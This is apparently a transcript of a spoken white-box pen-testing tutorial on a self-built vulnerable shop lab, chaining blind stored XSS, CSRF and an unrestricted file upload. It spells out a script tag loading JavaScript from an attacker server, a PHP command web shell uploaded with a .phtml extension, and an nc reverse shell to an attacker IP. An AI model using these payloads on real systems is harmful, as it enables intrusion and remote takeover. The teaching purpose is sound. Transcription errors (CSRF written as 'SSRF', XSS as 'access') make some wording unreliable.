So, hi everyone, this is Ronak Parmar, and yesterday I gave a talk on white box pen testing part 2, where I explained about XSS, CSRF, and unrestricted file upload, and I will be repeating it again so that those who have missed the session can check out here. So, who am I? I'm a DIY student. I'm doing OSWE, and I even gave my first attempt, and I was not able to accomplish the goal because of few points. So better try next time. So today we are going to see about three vulnerabilities, which are XSS, CSRF, and unrestricted file upload. So first we'll go on XSS for XSS. So XSS is the cookie stealer, where XSS is an attack where a user input can be used to add scripts in the web application for permanent or once at a time. So it's like malicious, like a attacker can input a malicious script, malicious input, you can say, which can be saved into database or for a temporary time, like reflected, like for once at a time. And then XSS are of three types, which are stored, reflected, and DOM. So stored is basically the input is being stored in your database, and the reflected ones means the input is getting reflected once at a time. Means like it's like you're inputting and it's getting reflected. It's not getting stored at anywhere. And DOM XSS is just like reflected, but the difference is that it runs the input is being run in the client side only. It never goes to the server side. Your input is going to the JavaScript, and the JavaScript does all the processes and reflects it back. So in this case, you have to do some source code review for JavaScript and not in HTML. And yeah, so for those who don't know what is XSS, it's like your this is the input, where this is your input, and it get reflected by like welcome and your name, and the code will be something like value, then the trouble one. So suppose if you inject something uh, like this, where you like trouble one, and you end the and put a colon, and then uh, inject a script like a script let one. So the input field, whatever the input field, you can just close that input field and can create one more JavaScript, and which can do your work. So this one is like a reflected one. So in this session, we are going to see about blind stored XSS. So what is blind stored XSS? First, let me tell you. Uh, I have explained what is stored XSS, but blind what is. So suppose like I'm sitting here, and the admin or the other user is somewhere else. So my input is getting stored, and it's getting reflected to someone else. So I cannot see what the input is. So it's like completely blind. Even if my script is working, I can't see it. So at these cases, what you can do is like you can create your own server, and whenever someone executes your script, the you can get a hit on your server. So at that time, you can analyze that, yeah, your access is working. So at these cases, it is called blind access, and it is exactly what it sounds like, blind. You cannot see what is going on. So, and yeah, so stored access can be in the comment section, where your input is getting stored in the comment section. So whenever if anyone opens the comment section, it will get prompt, and it will get an alert. So this is called stored. And stored access and blind access is completely different. It's not, no, like it's different, but they can work together also, or differently also. That is because store access can also be seen just like in comment. You input your value, the value gets saved, it gets deflected, and you can see the script, like your whatever the script that you have that has been executed. And yeah, what is the impact of XSS? The impacts can be like hijacking any account or spread web worms and many more. So yeah, so demo. So this is the lab I have created for this, and in particular that it's not so advanced lab, but still it's fine. So we have two users. One is the like just for user, and second one is for admin. So my, so I just show you what I have created. This took me almost 20 hours, I guess. And whatever I created from here is I just Google it. I just Google like what to do this, how to do this. I want to create a script like this. I want to do this like this. How can I protect this and all that stuff. Yeah, this is a cart where I can remove stuffs. I can add and I can buy also. The buy is not working just for show. Yeah, but this is working. So this is the contact form, and now see if I inject something like my name like Ronak, and the message would be something product like where is my where is my product. I submit it. Now see the value that you have injected doesn't is not being reflected to you. So at this time you may think like there is no vulnerability like access vulnerability. So and but still your value is being saved in a database, and somewhere it's getting executed again. So at that place it's get executed and you can steal some data. So this is what we call blind XSS. Yeah, blind stored XSS also can say. Yeah. So let me just show you. So this I'll just open it in private window. Open host. Okay, fine. This is not working. LOCAL. What I like LOCAL. Yeah, and go to admin login. Okay, due to proxy, my CSS is not working here. Yes. Yeah, now it's working. Okay, so admin gets login. Yeah, so this is the admin page where we have home, messages, statics is not working. And I have a calendar and some users where I can search for user field. Then settings. We are going to look here after later on. So home, I mean messages. So yeah, I injected this runner and my message was like where is my product. So as a white from as this is a white box pen testing, how to analyze that there is an exercise. You can just directly go and see the admin's page and just check out where your input is getting reflected, and through that you can do some trial errors. So if I inject here something values, as you can see there is the maximum limit is 20 characters. So at that time I cannot write a whole script, but there are many other ways like reducing your um, domain name into 3 characters like something. It will be svg onload onload and alert and doing something like that. But there are many ways also to bypass this restriction. But right now I will just keep it very simple. Script. Script. One. Okay. So this is my message. Let me see. Script. No. Background. Two. So now if I send this and again check the message field, I get the alert. So this is where from a white box pen testing, I can analyze that there is a XS vulnerability going around in the admin's web page, not in the content field. Content field is proper, but the admin page is not so good. Okay. um, Now the next, so this was the blind XSS, blind stored XSS I was talking about. And we can do many other things, like we can steal cookie also, but okay, we'll talk this about later. So where was I? This was the, yeah. Hmm. So now SSRF. So SSRF is a vulnerability where an attacker is able to influence users to perform actions. But what this exactly means? So suppose I am an attacker and there is a, and just imagine, like there is a user or victim. Now I want to delete his account. Now I like delete his account or do some any malicious activities that he doesn't want to do. So if I directly go to him and say, hey bro, just go and delete your account, so obviously he's not going to do. So in these cases, we can, what we can do, we can use a SSRF attack so that we can run, we can on, I mean, in SSRF attack on my behalf, attack the victim will run some action, run some actions which he doesn't even know that he is doing something like that. So suppose like I can send him a HTML page, and he will, whenever he click that link, and behind that page there will be a code like go and delete your account. Now he doesn't know that I'm doing any things like I'm deleting my own account or sending any emails to someone else. And so this is what we call cross-site request forgery, because from other side someone is sending me a link, I'm clicking it, and it's getting executed without my knowledge. Just suppose like this, just an example, this is not a real life example, but just for understanding, like there would be a link where it's called update password is equal to my new password. Now there are ways, okay, I just change it to password to email. No, if you, otherwise you will say like that is a, or we have to first write old password also. Okay, so there would be a link where user can update his email ID using like update email and my new email. So at this time I can like, just again, oh wow, fine, the color is changed. Okay, at this time I can send this link, and whenever he clicks that link, his email will be changed without his knowledge, and I can like go and I can inject my email ID, and then when I want to retrieve password, then I can go and do forget password, and the link and the password reset link will come to my email ID, and this, and then what, it's called account takeover. So SSRF can be secured by using an anti SSRF token, where if the link doesn't have that token with a specific values, the action will not work. So rather than stealing the cookie, we will leverage our access vulnerability. I'm talking about the lab that we are going to solve today. So rather than stealing the cookie, we would leverage the access vulnerability to force an authenticated victim to execute whatever actions we want without the user knowledge. So we have access vulnerability. So for why we are not stealing the cookie? Because suppose even if we steal the cookie, and suppose, and if the victim gets log out, so if the victim gets log out, then we also go get log out, and we would not be able to do anything. So SSRF can be used to update email IDs, send emails, delete mails, change values in settings, or and many other things. Now the time for demo. So how can analyze that? So I'll show you how to do a CSRF attack using XSS vulnerability. So this is so okay. Now, during analyzing like how admin page is made up, we have seen that there are some actions going on here, where we have add coupon, upload directory, and some settings for changing the password. Since we don't know what is the old password, we cannot do some we cannot pass the actions. So for once you can say even this doesn't have a CSRF token, still it's working like CSRF token because it wants that old password. It's like if this value is not proper, we cannot change a password. So but this one is not secure. We can change the values using a CSRF attack. So what we have to do first, just have to see like how this is implemented, like how this action is going on, what parameters is being used. I'll just put my proxy on. Yeah, and I just like allow sign up, yes. Then coupon would be test, no not test, get 100, and directly would be um, new dir, and go for save. Now this is how my request looks like, where I have a post request from hrdocs admin and settings.php. Then my content type is application x-www-form-urlencoded, and these are the parameters. These are the 4 parameters is required: like save, upload directory, and coupon, and sign up. So we can like in real life there would be a big body where we have too many parameters. During that time we can do a source code review for like what parameters is being used, is needed. So just do a code review like how it is going on. Var www htdocs html, and this is for htdocs admin, then admin settings.php, settings.php. Okay, so just find this upload dir somewhere. Yeah, here it is. Or you can use grep command also. Just show you how to use grep command. Suppose you don't know even which page you have to go on, you can simply just go for grep -r, and then -e, and just write it upload.dir, and see, we'll get it. Now you can even use like color color. So one is in send message, then in settings.php. So some settings. So you can see like in settings.php there are too many upload directories. So I will just go to this page and do a code review. So I'm already in this page. So how is it implemented? First, there is a check for the save. If post request have saved, so that means that if we change the request to get request, it won't work, because since it's checking for the post request, not for get request or just request. Sometimes it would be like REQUEST request. In these cases, it checks for anything, like if even if it's for get or post. So request means anything. It's like check the request, whatever it's post or get or put, it that doesn't matter. If the request has a parameter anywhere which name is saved, and then just go on. But in this case we have post request, so we have to keep the request in post only. So if the request has a parameter called save, and if the request is sign up, so this is going to work, else off. So this is not useful for us, because the main thing is like upload directory. Since you can see upload directory is MySQLi real string, so this um, function is being used. So even if you want to do a SQL injection, it won't work here, because it's escaping all the special characters by injecting by putting a backslash, and there is a dir like directory name. Okay, so if the okay, this is not important for us right now. Yeah, important is here, because this is a place, this is the SQL which is getting used to update the settings, like update settings, set sign up is going to allow sign up if the sign up is on or off for that. Then coupon is equal to the value, and the directory name. You can see directory name is temp. The temp is being used. You see, the temp is being used, and then the upload directory, the whatever name we will be injecting will be there, and where the ID is equal to 1. So just keep remember, we are going to this. There is a vulnerability here going on, and I will be talking about this later on, where when we will be talking about unrestricted file upload. Okay. So this is how it is going on. So we have to put this save button, save here, and upload directly, and the coupon, and sign up. So I have already created this. Let me create a new way only. Okay. So first we are going to create a function. This one function. My name would be change. uh, no, change change. Let me get settings. Yeah, and settings. So in this case, now I'm going to use a XHR API, which can help, which allows us to create a request. So let's see. Okay. XHR is equals to new XML HTTP I think it's right, because some places we have to put some small HTTP request HTTP. Okay. HTTP request, then var xhr is equals to xhr dot open. I will open. Now I want a post request, right? So I put a post here, and the link, the URL, you can say. So my URL was http local host htdocs, then it's admin dot, I will be settings dot php, and I'll put a true. It ends here. Now, so this was the first thing I implemented here. Now we have to put the header part. So it will be like xhr dot set set. I just forgot it. Set header or set request header. request set request header. Because being this head h is long. Yeah, it's right. Okay, set request header. And what main thing we want is this content type. See, we need that content type, and then credentials, and that's it. We need a content type, and the value would be this part. Okay, applications. Then we have to set the credentials, like for credential means we set a cookie, like if the session is active, so like that. xhr dot with credentials. C capitals, please. Because the spelling is right. I have with credentials. Yeah, spelling is right. Yeah, my spelling is very weak. So it's TRU. It should be true. Then we have to send the body. So it's like xhr dot send, and the body part is this one. That's it. We check if I filled it the right way. So it was coupon is, let's say upload directly. Is there something missing? Okay, coupon was not there. Sign up was not there. Okay, that's not in sense. Looks fine. Yeah. So this is how you can create a XHR, create a CSRF. I mean the post request using a XHR API. So now I will forward this. Okay, let me show you the value of right now. What the value is. MySQL one select everything from and the settings. I didn't remember my table name only. I think it's setting. No. Just a second, which one I have taken here? This is not my page. Is this one I'm using now? Settings.php. I think I have done some mistake here. Yeah, I have not used. I have used the wrong databases. Use shop service. Yeah, no. Yeah, this is the page. So you can see the value is temp dir and dir. Okay. So and the value now I will be using here. This will be a blank value. Now let's see if we get a blank value. No, name would be hacker and the script here SCRYPE. I really cannot see my buttons on also because of this light. Okay. And SRC first HTTP. I put one symbol here. HTTP no 192.168.0.42, which would be on 8000, and my name is not name of my script explox, right, dot js. So here I will be running on my Python server python -n simple http yeah HTTP server on port 8000. No module like okay HTTP simple HTTP is just okay 8000. Yeah. So now I will just send this script. It's gone. And now just check out here. I will click that message. It opens message.php. And now if I forward this, I even get the settings.php is working around here, and you can see my script is being uploaded. So this was for a previous like we have used that one. Okay, and you can see the values that we have put an empty value. So now if I will forward it, and it's like whenever the attacker, the victim, admin, will click on message, the script is going to work anytime. We will just remove later on. We will remove that this alert. Okay, this one is working. And now if I check it in my database, the value, you will see an empty value. And if I again put some values like test, and again and admin if again clicks on it, it's been changed. So this is how a CSRF attack works, where the admin is running some actions without his own knowledge, and and without his own knowledge behalf of me. During recording, I really get nervous, and this is the second time I'm actually recording it. I've already recorded this whole video yesterday, but then I felt like my communications was not so good, so I thought again record it back. Yeah. So I hope this till here it's all properly understood at what is XSS and how it works and how I use CSRF attack using XSS. Now we are going to go for unrestricted file upload. So let me just show you it is. Yeah. Now we also have a feature called add attachment, where we can upload a script, something like xs.txt. If I upload it and save here, so my file is getting uploaded. So this is the admin page. Okay, it's getting uploaded outside because I have already did some malicious things previously. So at the time there would be no, it's been uploaded here. Let me see. It should not upload actually. No, it's getting uploaded outside only. Let me just check out once again. Yeah, it's getting uploaded here. Okay, it's for test.php. So my file is getting uploaded here. Okay, at the temp in the temp directory. And if I go and try to try to access that file, I'll just go and write a temp tmp, and here I got a server error. You would be thinking like, why? What's going on? So if I click on Control H, you can see there is a hidden file called htaccess, where it denies any HTTP request any HTTP request, which and it will give a server error. So even if we are able to upload a just a second, my nose. Yeah. So even if we are able to upload a malicious script, and but we are not allowed to access that file. So in these cases, we can again go and do some code review, like how you can upload that file. So just see, just we have to see like how my file is getting uploaded. I have shown you like the page settings.php. That is, yeah. So as you can see the directory, how the directory name is being is being used. It is like temp slash and then whatever the directory name is, and then your file is getting uploaded into that directory. So at that time, what you can think is you can try to do okay, rather than here to doing anything, you may be thinking like, if I will upload a directory using a file using a directory traverse attack. So I'll just go down again with my, yeah, this is the file. I will send it to repeater. You would be thinking like you can do a traversal attack, right? So I'll just put this double slash double dot and slash, like that it's going in temp directory. So I will be uploading one step back. Okay, and now if I check around here, you don't have the file, right? You don't have it. Double dot. So now we can do it now again. We can do a code review, like how and why, like why this traversal attack is not working here. So I'll just go on in contact.php, where's my contact, no, contact.php, yeah. Okay, rather than going in contact.php, I'll just use this something like let's see, file name, no, okay, let me go to contact.php first. Now we'll do a code review. I know it's my code, but still I will act like I don't know anything. Okay, we have add attachment here, we have a file, and there is a form, and form is still here, and it calls action at contact.php, so it's calling here. I go up, it's my session and header. Okay. Let's see here. We have one more PHP. It is send message.php. Okay, fine. We'll go and see that page. Send message.php. Yeah, that's good. Nice. This one will help us to analyze what's going on. So you can see from here, if the post request only if the post request has submit, it will go further. Then it has a name. Then yeah, I have used this to mitigate, how to show you how you can mitigate this. But it doesn't make sense right now. This is for the protection for XSS vulnerability in the message and name, where you can just remove all the special characters. So if I will inject, I put this value, so the access vulnerability will not work anymore. Okay, so okay, then there is a message for the post, then a date, then an email ID which is taken from the session, then a SQL query is being created, insert the values, blah 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 blah, these all things. But we are interested in the file. Yeah, so file name is here. So what's going on here? So the file name is being split it using a dot, by from a dot. So if the end of the if it's like at here, it is checking the extension of end dot end extension, like how the file is getting ended. So if the extension is anything from these part, so your file will not upload, and it will give you an upload error. So here you can say like there is a blacklisting going on here. If anything from here matches, your file will not work. You can see even the PHP is being blacklisted. Yeah, and if the extension is right, so it will go further. And here your file name is being taken, and it's getting URL encoded, I mean decoded, if there is any URL encoding. Then anything, any special characters, something like that, will get replaced by empty value. Then again there is a check for the file directory traversal, means the developer, that is me, the developer has checked for the has validated the user input, and sanitized, and sanitize the file name, due to which you are not able, won't be able to upload, you won't be able to do a traversal attack. So many times we think like we can put a URL encoding. So since there is if you put URL encoding, it will get decode, and if you and any special characters, and then after decoding, any special characters like this will get removed, and even the dot slash will also get removed. So if you were in if this page is would be working in Windows system, you might you would be able to do a traverse attack by using front slash, like this, yeah, like this, because we have in Windows, we use front slash, no? Okay, hey, this is front slash. And then so this was the reason. So we can't do it, we can't do directory traversal attack in while uploading a file. So now we will see uh, how this file is being saved or like we will see where it is being saved and the place where it is being saved, is there anything going around there. So we will so while doing that we come across this settings.php, and we check out here that we have a system where we have an option for uploading a directory. Yeah, and as I told you to remember that temp, there's a temp is going on. Where is that? Yeah, settings where we have a temp. What did this is this one? Yeah. No? Mm, this was the page I was. What is that? Query. I wanted query. Yeah, this one. So there's a temp and then the directory name. So what you can see the thing like you can change the and wait a second. Even before that, I'll show you the send message. How the send message is being used. So where this file is getting uploaded, first of all, you have to find out that. Let's see my SQL. First SQL is going on here. Then some white blank listing is going on here. The file is getting explored. The end of the extension is getting checked. If it's all, if there is a malicious extension, it won't work. Else go and change the file name and then select settings, everything from settings, and then fetch the directory and move the directory name into the file and a directory. Now what is the now the directory is here, right? So this is the directory where the file is will be uploaded. The file is will be uploaded. So this is the directory. We come to this directory part. So in the row of directory, upload directory. So let me go to SQL database, and we have this upload directory. Select everything from settings, and the row upload directory, the value is this one. So whatever the value would be, and that at that place the file will be getting uploaded. So what if I change the value of temp slash dot to dot then temp slash dot slash. So what? So at this time, whenever I upload a file, it will be like go and upload a file. The value would be temp slash dot slash go back and then upload a file. So we can't do traversal attack in by uploading a file, but we can do a traversal attack using a settings of admin. So if I can change the value of temp slash to temp slash dot slash, so the value so suppose my file name is xs.txt, so the file will be uploaded in like temp slash, when I will upload the directory in settings.php, like here I will upload a value like dot slash yeah, then dot slash, and what's my the name of my file, like xss.txt. This could be done. We can upload a malicious file outside the temp directory and then we can access that file. So let's do this. So I will not be doing it here. I will be just going around here and just change the value of upload directly to dot slash control s, and then I will click your message. Before that I'm going to do a proxy. I will click your message comes, then alert comes, and settings. Now settings.php, and the value you can see dot slash tst. Okay, I just want to remove. I don't want that tst to be there. Okay, I just dropped this down. Wait, click it here, forward, forward, and now if you see the value, you can see temp dot dot slash. And now if I will upload my file here, try again. No, not all this here. Test, browse that file. I will use another file of the test. Okay, this SQL py and submit it here. You can see there is no file like SQL.py. There is no file. And now if I will forward this, and let me check it again. You will find that file SLQ. Okay, SLQ. This was not SQL. SLQ. SLQ. Misspelled. And now my file is getting uploaded outside that temp directory. And now I can just get access to that file. So now next stage is uploading a malicious file, malicious PHP file to get a shell or RCE. So I'll just do it again. We'll do for py. This part. Send it to repeater. Okay, actually this was the tool I was trying to build up after watching Naman Sek's video. Naman Sek. I'm sorry. PHP. Echo EXEC bracket, get it from $get request, so, and from a value called CMD. That's it. I will just send it. Okay, I didn't change the PHP. Let me see if I have got that. Just remove this. I can't see that PHP SQL SLQ. Let me change the value first. Shell.php. That's what sound weird. Yeah, you can see we have an error that is upload error format not expected. I have shown you that there was a blacklisting going on around, and due to which we cannot upload, we cannot use that PHP file. There's a blacklisting for PHP 5, PHP, and PHP 3. We can use other. There are many other extensions we can use, which are PHP 5 and PHP 7, PHP 4, and then. But still, at this place we have some extensions like PHTML is not there, so we can use that PHTML, and there are more extensions like PHT. PHT can be used if PHTML is being secured. Where it is, it's here only. You can use PHTML, and I'll send this. If I see for the error, yeah, we get a success. So if now I will, yeah, I can see. Let me do it again to show you that there was no file like sh. Okay, there is no file. Okay, there is a file. Delete it. Send it again. And we have that file. And now if I will, now I can access that file. Okay, what's up? Localhost docs or shell.phtml. Proxy is on. Obviously it will give me error because we have not, because we don't have that CMD, right? CMD. Now the CMD value is blank. So if I will inject, now it's right. Now if I add with ls, we get value and ls. So LA, then ID, all that stuffs, all the basics. And to get a shell, we can open a port here in C /nv lp dot port, enter, and here in C nc nv 192.168.0.42. This IP is my attacker's IP. You can say attacker's IP. Then the port which attacker has opened 1, 2, 3, 4, and the right I want be like bin bash. You can use bin as also. Bin bash, not dash, bash. And now I can, no, I still have no rights bin bash. Okay, no problem. I'll just do it again. 192.168.0 bin sh. Still not have the rights. NC NVLP 124. Yeah, hyphen E is not being used. No, that's it. Yeah, we get a shell. I didn't even show you the slides also. Yeah, so let me just explain this one also. CSRF, what's that? Okay, it's not right. Unrestricted file upload. Didn't change the keep. Now it's right. So developers do blacklisting to prevent any malicious file upload by malicious file upload by checking the file extensions by using these characters, these extensions. But developers may not be aware of all the possible extensions. Like I told you that in this case we have one more extension remaining, which is called PHT. Then this is the code I showed you. It's been already, we have already done. You can see. So PHP 1, 2, 3, 4, 5, 6, 7, PHTML, EXE, HTML, CGI, GIF. We cannot upload any image file also. And there was a temp directory which contains .htaccess, because of which we were not able to access that temp directory. Then order deny, and will disallow any HTTP request. Then this was the exploit for the post request we have created. It's called xhr. We use xhr API and post and this URL and true, and we set a request header using a content type. Then we set a with credentials to true, and the body part is the parameters. And demo, I've already shown you the demo. Let me recap what we have done. Okay. So first we have found that there was a stored XSS is in found stored XSS vulnerability in admin's web page through users contact form. So that means like contact form was alright, but the admin page was vulnerable. So through XSS we use xhr API for CSRF attack in admin's web page, right? Then we found that there was an add attachment which was saving the data into a temp and whatever the directory name was, which contains the temp folder which contains .htaccess, because of which we can't access our uploaded file, right? Then add attachment was secured. Obviously, add attachment was secured. The extension was even pretty good, and there was a .htaccess file which disallowed the request. So we can say that client side was pretty secure for uploading a file, but the admin's page messed it all, because admin page was not secure and admin setting page was not properly implemented because of CSRF attack. So with the help of CSRF attack, we changed the upload directory to dot slash, and by uploading a .html file, we could get a reverse shell. As I told you, there is not only these extensions, there are many more. Not just PHP. There we can use even other cases. Suppose if there would be a Windows system, we can use other VBS script, and there are many more. There was a one more technique called null null injection, null injection. So through which we can use, like, but that even if you go for null injection, it will not. I just forgot a name. What it's called? Null byte injection or null injection. Okay. So even if you do that attacks, it won't work because you are not able to access the file only. So the mitigations could be, I've already shown you this. Oh my. Okay. I've already shown you this one. We can remove any special characters from the user input, so through which XSS won't work, and we should add a CSRF token properly in a proper way, and the CSRF token should not be saved into database. And every time you make a request, the token should be unique. It should always be a unique one, because there are many other ways also to bypass this technique. And a proper investigation should be done while doing a blacklisting, yeah, because developers may not know about all the extensions. It's not about just using a PHP extensions, there are many more also. So there should be a proper investigation done, and should be a proper blacklisting should be done. So these were the mitigations, and my Twitter account trouble1_product. So trouble1 is actually was my stage name when I was a DJ for almost 3 years. I played for more than 20 colleges. So it's been my 8 months from the time when I have been started doing pen testing, and 1 year ago, my question was, what is coding? So feels great. Yeah, I am doing coding. So this is for today. Let me remember if something else is remaining. Yeah, you can use this lab if you want to. I have uploaded it on my GitHub account. GitHub. Yeah, this one, Naman said. He really helped me out by watching his videos. I really learned too much about recon. So yeah, this is what is this? Dirt search. Okay, I start, I guess. So this is the shopping site. You can use it. You can use it, and there's a my PDF also is being there's also my PDF, and this how to install the setup. If you feel, and if you're not able to install it properly, you can message me on Twitter account. And there's also a lab for type juggling. If you're interested in type juggling, to learn what type juggling is and how you can do it, you can just check out this lab. And there's a script for a blind injection. This one is just a very basic script for using how you can go for SQL map. But what if there will be a time where SQL map won't work? You have to manually write a script only. So I will be talking about how to create a Python script for the second order SQL injection where you can't do SQL map directly. So I hope this Saturday or Sunday I will create a video on it. Let me show you a demo, like how that script looks like. Not, no, it's not here. Yeah, this one. So this is the script I have created for my previous lab. I think that lab also is here. The white box. No, this one. White box pentesting. Yeah, you can use this lab also for if you. It is a bit difficult because you have to create your own script. Without that, you cannot solve this lab. Or if you find any other way to bypass the admin's login page. So that's great, but try to do it using a SQL, like retrieving the data from the database. If you feel like you want to. So this is the script I had created for the lab for that previous second order SQL injection. I will be explaining how I created this whole Python script. Okay, that's it for today. Thank you.